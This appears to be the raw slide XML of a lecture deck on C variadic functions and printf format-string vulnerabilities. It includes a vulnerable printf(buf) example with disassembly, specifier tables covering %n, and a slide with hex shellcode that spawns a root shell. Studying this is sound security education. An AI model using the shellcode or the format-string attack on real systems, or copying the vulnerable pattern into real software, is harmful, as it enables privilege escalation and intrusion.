            <a:ext cx="492443" cy="7201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callee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Left Brace 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="30152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533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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7935" y="2000236"/>
            <a:ext cx="492443" cy="7010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0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3165" y="2427863"/>
            <a:ext cx="320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char s1[] = “hello”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char s2[] = “world”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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(“%s %s %u”,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s1, s2, 42);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62559"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="4859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callee-save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3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47935" y="4321715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/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Left Brace 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="30152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533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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7935" y="2000236"/>
            <a:ext cx="492443" cy="7010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caller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3048000" y="4114800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96594"/>
              <a:gd name="adj2" fmla="val -22432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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“%s %s %u”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3352800" y="3124200"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -115573"/>
              <a:gd name="adj2" fmla="val -1248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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“hello”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3352800" y="2209800"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116417"/>
              <a:gd name="adj2" fmla="val -367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of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“world”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangular Callout 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="1371600"/>
            <a:ext cx="1600200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96575"/>
              <a:gd name="adj2" fmla="val 4022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2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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:hlinkClick r:id="rId3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#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdarg.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;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dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo(char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, ...)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va_list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ap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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> d;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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> c, *p, *s;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cs-CZ" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_start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ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ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(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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case 's':                       /* string */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                   s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *);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("string %s\n", s);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break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 'd':                       /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty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d = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_arg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ap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%d\n", d);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break;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            case 'c':                       /* char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/* need a cast here since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> only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   takes fully promoted types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c = (char) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_arg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ap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                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> %c\n", c);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break;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va_end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ap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6096000"/>
            <a:ext cx="227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Example from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> man entry</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>linux.about.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/blcmdl3_va_start.htm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8832" y="1447800"/>
            <a:ext cx="39555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it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo(“sdc”, “Hello”, 42, ‘A’);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>=&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string Hello </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char 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246823"/>
            <a:ext cx="8839200" cy="480131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iwconfig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accesspoint</a:t>
            </a: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iwconfig</a:t>
            </a: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4685" y="351949"/>
            <a:ext cx="874230" cy="408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ambria"/>
              </a:rPr>
              <a:t>OK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2743200" y="103821"/>
            <a:ext cx="457200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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3781" y="1981065"/>
            <a:ext cx="4029638" cy="36933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01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bfff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 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd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524002" y="5818823"/>
            <a:ext cx="2113515" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -96733"/>
              <a:gd name="adj2" fmla="val -42435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  <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Superuser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="wifi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26" y="19061"/>
            <a:ext cx="1608834" cy="15411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ight Brace 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="3848103" y="-216821"/>
            <a:ext cx="457200" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 78772"/>
            </a:avLst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3112" y="1039265"/>
            <a:ext cx="1600200" cy="5029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ambria"/>
              </a:rPr>
              <a:t>Exploit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5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88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Specifications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3915166"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="229024" y="2253576"/>
          <a:ext cx="4876376" cy="3571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6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  <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> as</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/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%u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decimal</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(unsigned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%x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(unsigned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%s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unsigned char *)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%n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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> bytes written so far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*)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57800" y="2253576"/>
            <a:ext cx="4038600" cy="4223424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0 flag: zero-pad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%08x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zero-padded 8-digit hexadecimal number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Minimum Width</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%3s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/>
              <a:t>pad with up to 3 spaces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(“S:%3s”, “1”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S:  1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(“S:%3s”, “12”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S: 12    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(“S:%3s”, “123”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S:123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(“S:%3s”, “1234”);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>S:1234 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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2971800" y="3276600"/>
            <a:ext cx="3200400" cy="881539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28600" bIns="137160" rtlCol="0" anchor="t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man -s 3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printf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3842" y="1371600"/>
            <a:ext cx="581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%[flag][width][.precision][length]specifier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2600" y="12192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think how to present this better. Probably break into two slides.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format strings, and more generally variadic functions, are implemented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How to exploit format string vulnerabilities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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Viewing memory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eriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwriting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4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599" y="473028"/>
            <a:ext cx="5486401" cy="16605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1.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foo(char *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2.    char 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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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4.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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5.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3103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080483d4 &lt;foo&gt;:    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483d4: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80483d5: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80483d7:	sub    $0x28,%esp       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; allocate 40 bytes on stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483da: 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0x8(%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:= M[ebp+8]  -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addr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of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fmt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80483dd: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%eax,0x4(%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  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M[esp+4] :=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 - push as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arg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2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483e1:	lea    -0x20(%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:= ebp-32    -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addr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of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buf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80483e4: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     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M[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esp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] :=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   - push as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arg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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483e7:	call   80482fc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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483ec:	lea    -0x20(%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:= ebp-32    -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addr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of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again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483ef: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     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M[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esp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] :=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   - push as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arg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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f2:	call   804830c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf@plt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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f7:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 80483f8:	ret    </a:t>
            </a:r>
          </a:p>
          <a:p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1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Diagram @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foo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8718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(32 bytes)</a:t>
                      </a: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stale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2895600" y="3733800"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85521"/>
              <a:gd name="adj2" fmla="val 3719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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fmt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2895600" y="4490762"/>
            <a:ext cx="1659020" cy="659131"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86650"/>
              <a:gd name="adj2" fmla="val -2742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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r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1.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foo(char *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2.    char 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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="982868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foo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49197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(32 bytes)</a:t>
                      </a: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stale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810000" y="3505200"/>
            <a:ext cx="4876800" cy="2457510"/>
            <a:chOff x="3810000" y="3505200"/>
            <a:chExt cx="4876800" cy="2457510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="3505200"/>
              <a:ext cx="4876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What are the effects if </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                  <a:latin typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                </a:rPr>
                <a:t>fmt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t> is: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%s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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
                <a:t>s%c</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="28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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
                <a:t>x%x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t>...%x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015420" y="4634423"/>
              <a:ext cx="408559" cy="1600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3729" y="5562600"/>
              <a:ext cx="1131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11 times</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arc 5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1.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foo(char *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2.    char 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3.    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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=&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  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590800" y="4007306"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97129"/>
              <a:gd name="adj2" fmla="val 1105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fmt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588579" y="4648200"/>
            <a:ext cx="914400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100558"/>
              <a:gd name="adj2" fmla="val -2666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buf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Specific Address—1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foo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33049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(32 bytes)</a:t>
                      </a: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stale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10000" y="3505200"/>
            <a:ext cx="4795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Observe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
